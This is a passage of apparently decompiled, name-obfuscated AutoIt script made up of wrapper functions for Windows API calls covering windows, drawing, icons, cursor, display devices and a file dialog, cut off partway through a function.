- Func Fn0020($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08,$ArgOpt09=0,$ArgOpt0A=0,$ArgOpt0B=0)
- IF $ArgOpt0A= 0 THEN $ArgOpt0A=Fn005B("")
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"CreateWindowExW","dword" ,$Arg00,"wstr" ,$Arg01,"wstr" ,$Arg02,"dword" ,$Arg03,"int" ,$Arg04,"int" ,$Arg05,"int" ,$Arg06,"int" ,$Arg07,"hwnd" ,$Arg08,"handle" ,$ArgOpt09,"handle" ,$ArgOpt0A,"ptr" ,$ArgOpt0B)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0021($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"DefWindowProc","hwnd" ,$Arg00,"uint" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0022($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"DeleteDC" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0023($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"DeleteObject","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0024($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DestroyIcon","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0025($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DestroyWindow","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0026($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawEdge" ,"handle" ,$Arg00,"ptr" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0027($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawFrameControl","handle" ,$Arg00,"ptr" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0028($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawIcon" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"handle" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0029($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=0,$ArgOpt05=0,$ArgOpt06=0,$ArgOpt07=0,$ArgOpt08=3)
- LOCAL $Var013D
- SWITCH $ArgOpt08
- CASE 1
- $Var013D =$Var004D
- CASE 2
- $Var013D =$Var004F
- CASE 3
- $Var013D =$Var0051
- CASE 4
- $Var013D =$Var0053
- CASE 5
- $Var013D =$Var0055
- CASE ELSE
- $Var013D =$Var0057
- ENDSWITCH
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"DrawIconEx","handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"handle" ,$Arg03,"int" ,$ArgOpt04,"int" ,$ArgOpt05,"uint" ,$ArgOpt06,"handle" ,$ArgOpt07,"uint" ,$Var013D )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn002A($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
- Fn0091($Arg00,$Arg01,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- Fn0081($Arg00,$Arg03,$Arg04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn002B($Arg00,$Arg01,BYREF $ArgRef02,$Arg03)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"DrawTextW" ,"handle" ,$Arg00,"wstr" ,$Arg01,"int" ,- 1 ,"struct*" ,$ArgRef02,"uint" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn002C($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
- LOCAL $Local0000 =DLLCALL("kernel32.dll","bool" ,"DuplicateHandle","handle" ,$Arg00,"handle" ,$Arg01,"handle" ,$Arg02,"handle*" , 0 ,"dword" ,$Arg03,"bool" ,$Arg04,"dword" ,$Arg05)
- IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
- RETURN $Local0000 [ 4 ]
- ENDFUNC
- Func Fn002D($Arg00,$ArgOpt01=TRUE )
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"EnableWindow","hwnd" ,$Arg00,"bool" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn002E($Arg00,$Arg01)
- LOCAL $Local0019 = 0 ,$Local00AB = 0 ,$Var013E [ 5 ]
- IF $Arg00<>"" THEN
- $Local0019 =DLLSTRUCTCREATE("wchar Text["&STRINGLEN($Arg00)+ 1 &"]" )
- DLLSTRUCTSETDATA($Local0019 ,"Text" ,$Arg00)
- ENDIF
- LOCAL $Local001A =DLLSTRUCTCREATE($Var010F )
- LOCAL $Local001B =DLLSTRUCTGETSIZE($Local001A )
- DLLSTRUCTSETDATA($Local001A ,"Size" ,$Local001B )
- DLLCALL("user32.dll","bool" ,"EnumDisplayDevicesW","struct*" ,$Local0019 ,"dword" ,$Arg01,"struct*" ,$Local001A ,"dword" , 1 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local001C =DLLSTRUCTGETDATA($Local001A ,"Flags" )
- IF BITAND($Local001C ,$Var0059 )<> 0 THEN $Local00AB =BITOR($Local00AB , 1 )
- IF BITAND($Local001C ,$Var005B )<> 0 THEN $Local00AB =BITOR($Local00AB , 2 )
- IF BITAND($Local001C ,$Var005D )<> 0 THEN $Local00AB =BITOR($Local00AB , 4 )
- IF BITAND($Local001C ,$Var005F )<> 0 THEN $Local00AB =BITOR($Local00AB , 8 )
- IF BITAND($Local001C ,$Var0061 )<> 0 THEN $Local00AB =BITOR($Local00AB ,0x0010 )
- IF BITAND($Local001C ,$Var0063 )<> 0 THEN $Local00AB =BITOR($Local00AB ,0x0020 )
- $Var013E [ 0 ]=TRUE
- $Var013E [ 1 ]=DLLSTRUCTGETDATA($Local001A ,"Name" )
- $Var013E [ 2 ]=DLLSTRUCTGETDATA($Local001A ,"String" )
- $Var013E [ 3 ]=$Local00AB
- $Var013E [ 4 ]=DLLSTRUCTGETDATA($Local001A ,"ID" )
- RETURN $Var013E
- ENDFUNC
- Func Fn002F($ArgOpt00=TRUE ,$ArgOpt01=DEFAULT )
- Fn0032()
- IF $ArgOpt01=DEFAULT THEN $ArgOpt01=Fn004F()
- Fn0031($ArgOpt01,$ArgOpt00)
- RETURN $Var0022
- ENDFUNC
- Func Fn0030($Arg00,$ArgOpt01="")
- IF $ArgOpt01="" THEN $ArgOpt01=Fn0045($Arg00)
- $Var0022 [ 0 ][ 0 ]+= 1
- LOCAL $Local001D =$Var0022 [ 0 ][ 0 ]
- IF $Local001D >=$Var0022 [ 0 ][ 1 ]THEN
- REDIM $Var0022 [$Local001D +0x0040 ][ 2 ]
- $Var0022 [ 0 ][ 1 ]+=0x0040
- ENDIF
- $Var0022 [$Local001D ][ 0 ]=$Arg00
- $Var0022 [$Local001D ][ 1 ]=$ArgOpt01
- ENDFUNC
- Func Fn0031($Arg00,$ArgOpt01=TRUE )
- $Arg00=Fn006C($Arg00,$Var004B )
- WHILE $Arg00<> 0
- IF (NOT $ArgOpt01)OR Fn007F($Arg00)THEN
- Fn0031($Arg00,$ArgOpt01)
- Fn0030($Arg00)
- ENDIF
- $Arg00=Fn006C($Arg00,$Var0049 )
- WEND
- ENDFUNC
- Func Fn0032()
- REDIM $Var0022 [0x0040 ][ 2 ]
- $Var0022 [ 0 ][ 0 ]= 0
- $Var0022 [ 0 ][ 1 ]=0x0040
- ENDFUNC
- Func Fn0033()
- Fn0032()
- LOCAL $Local001E =Fn006C(Fn004F(),$Var004B )
- LOCAL $Var013F
- WHILE $Local001E <> 0
- IF Fn007F($Local001E )THEN
- $Var013F =Fn0045($Local001E )
- IF $Var013F ="#32768" THEN
- Fn0030($Local001E )
- ELSEIF $Var013F ="ToolbarWindow32" THEN
- Fn0030($Local001E )
- ELSEIF $Var013F ="ToolTips_Class32" THEN
- Fn0030($Local001E )
- ELSEIF $Var013F ="BaseBar" THEN
- Fn0031($Local001E )
- ENDIF
- ENDIF
- $Local001E =Fn006C($Local001E ,$Var0049 )
- WEND
- RETURN $Var0022
- ENDFUNC
- Func Fn0034()
- Fn0032()
- LOCAL $Local001E =Fn006C(Fn004F(),$Var004B )
- WHILE $Local001E <> 0
- IF Fn007F($Local001E )THEN Fn0030($Local001E )
- $Local001E =Fn006C($Local001E ,$Var0049 )
- WEND
- RETURN $Var0022
- ENDFUNC
- Func Fn0035($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"ExpandEnvironmentStringsW","wstr" ,$Arg00,"wstr" ,"","dword" ,0x1000 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- RETURN $Local000E [ 2 ]
- ENDFUNC
- Func Fn0036($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
- LOCAL $Local000E =DLLCALL("shell32.dll","uint" ,"ExtractIconExW","wstr" ,$Arg00,"int" ,$Arg01,"struct*" ,$Arg02,"struct*" ,$Arg03,"uint" ,$Arg04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0037($Arg00)
- DLLCALL("kernel32.dll","none" ,"FatalAppExitW","uint" , 0 ,"wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
- ENDFUNC
- Func Fn0038($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E
- IF ISPTR($Arg02)THEN
- $Local000E =DLLCALL("user32.dll","int" ,"FillRect" ,"handle" ,$Arg00,"struct*" ,$Arg01,"handle" ,$Arg02)
- ELSE
- $Local000E =DLLCALL("user32.dll","int" ,"FillRect" ,"handle" ,$Arg00,"struct*" ,$Arg01,"dword_ptr" ,$Arg02)
- ENDIF
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0039($Arg00,$ArgOpt01="")
- LOCAL $Local000E =DLLCALL("shell32.dll","INT" ,"FindExecutableW","wstr" ,$Arg00,"wstr" ,$ArgOpt01,"wstr" ,"")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 3 ])
- ENDFUNC
- Func Fn003A($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"FindWindowW","wstr" ,$Arg00,"wstr" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn003B($Arg00,$ArgOpt01=TRUE )
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"FlashWindow","hwnd" ,$Arg00,"bool" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn003C($Arg00,$ArgOpt01=3,$ArgOpt02=3,$ArgOpt03=0)
- LOCAL $Local001F =DLLSTRUCTCREATE($Var0111 )
- LOCAL $Local0020 =DLLSTRUCTGETSIZE($Local001F )
- LOCAL $Local0021 = 0
- IF BITAND($ArgOpt01, 1 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0041 )
- IF BITAND($ArgOpt01, 2 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0043 )
- IF BITAND($ArgOpt01, 4 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0045 )
- IF BITAND($ArgOpt01, 8 )<> 0 THEN $Local0021 =BITOR($Local0021 ,$Var0047 )
- DLLSTRUCTSETDATA($Local001F ,"Size" ,$Local0020 )
- DLLSTRUCTSETDATA($Local001F ,"hWnd" ,$Arg00)
- DLLSTRUCTSETDATA($Local001F ,"Flags" ,$Local0021 )
- DLLSTRUCTSETDATA($Local001F ,"Count" ,$ArgOpt02)
- DLLSTRUCTSETDATA($Local001F ,"Timeout" ,$ArgOpt03)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"FlashWindowEx","struct*" ,$Local001F )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn003D($Arg00)
- LOCAL $Local0022 =DLLSTRUCTCREATE("float" )
- LOCAL $Local0023 =DLLSTRUCTCREATE("int" ,DLLSTRUCTGETPTR($Local0022 ))
- DLLSTRUCTSETDATA($Local0022 , 1 ,$Arg00)
- RETURN DLLSTRUCTGETDATA($Local0023 , 1 )
- ENDFUNC
- Func Fn003E($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"FlushFileBuffers","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn003F($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04,$Arg05,$Arg06)
- LOCAL $Local0024 ="struct*"
- IF ISSTRING($ArgRef04)THEN $Local0024 ="wstr"
- LOCAL $Local000E =DLLCALL("Kernel32.dll","dword" ,"FormatMessageW","dword" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword" ,$Arg03,$Local0024 ,$ArgRef04,"dword" ,$Arg05,"ptr" ,$Arg06)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local0024 ="wstr" THEN $ArgRef04=$Local000E [ 5 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0040($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"FrameRect" ,"handle" ,$Arg00,"ptr" ,$Arg01,"handle" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0041($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"FreeLibrary","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0042($Arg00,$ArgOpt01=1)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetAncestor","hwnd" ,$Arg00,"uint" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0043($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","short" ,"GetAsyncKeyState","int" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0044($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetBkMode" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0045($Arg00)
- IF NOT ISHWND($Arg00)THEN $Arg00=GUICTRLGETHANDLE($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetClassNameW","hwnd" ,$Arg00,"wstr" ,"","int" ,0x1000 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
- ENDFUNC
- Func Fn0046($Arg00)
- LOCAL $Local0017 =Fn0048($Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0017 ,"Bottom" )-DLLSTRUCTGETDATA($Local0017 ,"Top" )
- ENDFUNC
- Func Fn0047($Arg00)
- LOCAL $Local0017 =Fn0048($Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0017 ,"Right" )-DLLSTRUCTGETDATA($Local0017 ,"Left" )
- ENDFUNC
- Func Fn0048($Arg00)
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- DLLCALL("user32.dll","bool" ,"GetClientRect","hwnd" ,$Arg00,"struct*" ,$Local0017 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local0017
- ENDFUNC
- Func Fn0049()
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetCurrentProcess")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn004A()
- LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"GetCurrentProcessId")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn004B()
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetCurrentThread")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn004C()
- LOCAL $Local000E =DLLCALL("kernel32.dll","dword" ,"GetCurrentThreadId")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn004D()
- LOCAL $Local0025 =DLLSTRUCTCREATE($Var010C )
- LOCAL $Local0026 =DLLSTRUCTGETSIZE($Local0025 )
- DLLSTRUCTSETDATA($Local0025 ,"Size" ,$Local0026 )
- DLLCALL("user32.dll","bool" ,"GetCursorInfo","struct*" ,$Local0025 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0027 [ 5 ]
- $Local0027 [ 0 ]=TRUE
- $Local0027 [ 1 ]=DLLSTRUCTGETDATA($Local0025 ,"Flags" )<> 0
- $Local0027 [ 2 ]=DLLSTRUCTGETDATA($Local0025 ,"hCursor" )
- $Local0027 [ 3 ]=DLLSTRUCTGETDATA($Local0025 ,"X" )
- $Local0027 [ 4 ]=DLLSTRUCTGETDATA($Local0025 ,"Y" )
- RETURN $Local0027
- ENDFUNC
- Func Fn004E($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetDC" ,"hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn004F()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetDesktopWindow")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0050($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetDeviceCaps","handle" ,$Arg00,"int" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0051($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetDIBits" ,"handle" ,$Arg00,"handle" ,$Arg01,"uint" ,$Arg02,"uint" ,$Arg03,"ptr" ,$Arg04,"ptr" ,$Arg05,"uint" ,$Arg06)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0052($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetDlgCtrlID","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0053($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetDlgItem","hwnd" ,$Arg00,"int" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0054()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetFocus" )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0055()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetForegroundWindow")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0056($ArgOpt00=0,$ArgOpt01=-1)
- IF $ArgOpt01=- 1 THEN $ArgOpt01=Fn0049()
- LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetGuiResources","handle" ,$ArgOpt01,"dword" ,$ArgOpt00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0057($Arg00)
- LOCAL $Local0028 =DLLSTRUCTCREATE($Var0113 )
- DLLCALL("user32.dll","bool" ,"GetIconInfo","handle" ,$Arg00,"struct*" ,$Local0028 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0029 [ 6 ]
- $Local0029 [ 0 ]=TRUE
- $Local0029 [ 1 ]=DLLSTRUCTGETDATA($Local0028 ,"Icon" )<> 0
- $Local0029 [ 2 ]=DLLSTRUCTGETDATA($Local0028 ,"XHotSpot" )
- $Local0029 [ 3 ]=DLLSTRUCTGETDATA($Local0028 ,"YHotSpot" )
- $Local0029 [ 4 ]=DLLSTRUCTGETDATA($Local0028 ,"hMask" )
- $Local0029 [ 5 ]=DLLSTRUCTGETDATA($Local0028 ,"hColor" )
- RETURN $Local0029
- ENDFUNC
- Func Fn0058($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetFileSizeEx","handle" ,$Arg00,"int64*" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 2 ]
- ENDFUNC
- Func Fn0059()
- LOCAL $Local002A =DLLSTRUCTCREATE("ptr" )
- LOCAL $Local002B =Fn003F(BITOR($Var0033 ,$Var0035 ), 0 ,A1000604D34(), 0 ,$Local002A , 0 , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local002C =""
- LOCAL $Local002D =DLLSTRUCTGETDATA($Local002A , 1 )
- IF $Local002D THEN
- IF $Local002B > 0 THEN
- LOCAL $Local000C =DLLSTRUCTCREATE("wchar[" &($Local002B + 1 )&"]" ,$Local002D )
- $Local002C =DLLSTRUCTGETDATA($Local000C , 1 )
- ENDIF
- Fn0088($Local002D )
- ENDIF
- RETURN $Local002C
- ENDFUNC
- Func Fn005A($Arg00,BYREF $ArgRef01,BYREF $ArgRef02,$ArgOpt03=FALSE )
- $ArgRef01=- 1
- $ArgRef02=- 1
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"GetLayeredWindowAttributes","hwnd" ,$Arg00,"dword*" ,$ArgRef01,"byte*" ,$ArgRef02,"dword*" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF NOT $ArgOpt03 THEN
- $Local000E [ 2 ]=INT(BINARYMID($Local000E [ 2 ], 3 , 1 )&BINARYMID($Local000E [ 2 ], 2 , 1 )&BINARYMID($Local000E [ 2 ], 1 , 1 ))
- ENDIF
- $ArgRef01=$Local000E [ 2 ]
- $ArgRef02=$Local000E [ 3 ]
- RETURN $Local000E [ 4 ]
- ENDFUNC
- Func Fn005B($Arg00)
- LOCAL $Local002E ="wstr"
- IF $Arg00="" THEN
- $Arg00= 0
- $Local002E ="ptr"
- ENDIF
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetModuleHandleW",$Local002E ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn005C($ArgOpt00=FALSE ,$ArgOpt01=0)
- LOCAL $Local0021 =OPT("MouseCoordMode", 1 )
- LOCAL $Local002F =MOUSEGETPOs()
- OPT("MouseCoordMode",$Local0021 )
- LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
- DLLSTRUCTSETDATA($Local0030 ,"X" ,$Local002F [ 0 ])
- DLLSTRUCTSETDATA($Local0030 ,"Y" ,$Local002F [ 1 ])
- IF $ArgOpt00 THEN
- Fn00A4($ArgOpt01,$Local0030 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- ENDIF
- RETURN $Local0030
- ENDFUNC
- Func Fn005D($ArgOpt00=FALSE ,$ArgOpt01=0)
- LOCAL $Local0030 =Fn005C($ArgOpt00,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0030 ,"X" )
- ENDFUNC
- Func Fn005E($ArgOpt00=FALSE ,$ArgOpt01=0)
- LOCAL $Local0030 =Fn005C($ArgOpt00,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0030 ,"Y" )
- ENDFUNC
- Func Fn005F($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetObjectW","handle" ,$Arg00,"int" ,$Arg01,"ptr" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0060($ArgOpt00="",$ArgOpt01="All files (*.*)",$Var0140 =".",$Var0141 ="",$Var0142 ="",$Var0143 =1,$Local00AB =0,$Var0144 =0,$Var0145 =0)
- LOCAL $Local0031 =0x1000
- LOCAL $Local0032 = 0
- LOCAL $Local0033 =DLLSTRUCTCREATE($Var0146 )
- LOCAL $Local0034 [ 1 ]=[ 0 ]
- LOCAL $Local0035 =$Local00AB
- LOCAL $Local0036 =STRINGSPLIT($ArgOpt01,"|" )
- LOCAL $Local0037 [$Local0036 [ 0 ]* 2 + 1 ]
- LOCAL $Local00BF ,$Var0147 ,$Var0148
- $Local0037 [ 0 ]=$Local0036 [ 0 ]* 2
- FOR $Local00EB = 1 TO $Local0036 [ 0 ]
- $Local00BF =STRINGINSTR($Local0036 [$Local00EB ],"(" , 0 , 1 )
- $Var0147 =STRINGINSTR($Local0036 [$Local00EB ],")" , 0 ,- 1 )
- $Local0037 [$Local00EB * 2 - 1 ]=STRINGSTRIPWS(STRINGLEFT($Local0036 [$Local00EB ],$Local00BF - 1 ), 3 )
- $Local0037 [$Local00EB * 2 ]=STRINGSTRIPWS(STRINGTRIMRIGHT(STRINGTRIMLEFT($Local0036 [$Local00EB ],$Local00BF ),STRINGLEN($Local0036 [$Local00EB ])-$Var0147 + 1 ), 3 )
- $Var0148 &="wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 - 1 ])+ 1 &"];wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 ])+ 1 &"];"
- NEXT
- LOCAL $Local0038 =DLLSTRUCTCREATE("wchar Title["&STRINGLEN($ArgOpt00)+ 1 &"]" )
- LOCAL $Local0039 =DLLSTRUCTCREATE("wchar InitDir["&STRINGLEN($Var0140 )+ 1 &"]" )
- LOCAL $Local003A =DLLSTRUCTCREATE($Var0148 &"wchar" )
- LOCAL $Local003B =DLLSTRUCTCREATE("wchar Path["&$Local0031 &"]" )
- LOCAL $Local003C =DLLSTRUCTCREATE("wchar Extension["&STRINGLEN($Var0142 )+ 1 &"]" )
- FOR $Local00EB = 1 TO $Local0037 [ 0 ]
- DLLSTRUCTSETDATA($Local003A ,$Local00EB ,$Local0037 [$Local00EB ])
- NEXT
- DLLSTRUCTSETDATA($Local0038 ,"Title" ,$ArgOpt00)
